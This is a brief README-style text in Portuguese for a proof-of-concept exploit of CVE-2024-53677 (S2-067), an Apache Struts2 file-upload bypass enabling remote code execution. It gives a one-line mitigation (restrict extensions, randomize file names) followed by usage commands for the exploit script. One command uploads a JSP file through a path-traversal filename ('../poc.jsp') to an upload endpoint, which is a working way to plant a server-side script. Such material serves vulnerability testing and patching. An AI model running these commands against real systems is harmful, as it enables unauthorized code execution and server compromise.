
Prova de conceito de exploração para CVE-2024-53677 (S2-067), uma falha de bypass na lógica de upload de arquivos do Apache Struts2 que permite execução remota de código através de parâmetros de nome de arquivo manipulados.
Portanto, a correção de mitigação também é simples: restrinja as extensões, use nomes de arquivo aleatórios personalizados, etc.
python3 s2-067.py -h
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s
